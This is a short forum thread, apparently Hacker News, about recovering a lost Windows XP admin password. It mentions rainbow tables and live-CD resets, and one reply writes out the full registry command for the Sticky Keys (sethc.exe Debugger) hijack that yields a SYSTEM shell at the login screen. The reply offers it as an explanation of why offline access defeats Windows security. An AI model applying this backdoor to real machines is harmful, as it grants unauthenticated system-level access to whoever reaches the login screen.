[nebster]

Do you mean the key for XP? If so, you can recover it using a command or through the registry.

You can use rainbow tables to crack passwords for XP which was super quick though!

[persedes]

Ah it was the password for the admin account and not the key!

[meinheld111]

Afaik you could just set a new admin pw using a livecd and some tool.

I wonder if that’s still possible.

[jasomill]

Not only is it still possible, there's even a supported first-party tool to do so,

https://learn.microsoft.com/en-us/microsoft-desktop-optimiza...

This only works for local accounts, though similarly trivial techniques apply to Active Directory accounts if you have "live CD" access to a domain controller.

Just to be clear, in neither case is this a security vulnerability; under the "live CD" assumption — specifically, that you're able to make even a single arbitrary registry edit — there are far simpler ways to completely bypass Windows security that require neither tools nor understanding of the (AFAIK undocumented) HKEY_LOCAL_MACHINE\SAM registry hive.

For example, make the registry edit given by the

  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
  Image File Execution Options\sethc.exe"
  /v Debugger /d C:\Windows\System32\cmd.exe /f

command (without line breaks).

Then, at any login, lock, or "Ctrl+Alt+Delete" screen, pressing the Shift key five times pops up a shell running as NT AUTHORITY\SYSTEM[1].

This has immediate effect — you don't even need to reboot or log out.

[1] https://learn.microsoft.com/en-us/windows/win32/services/loc...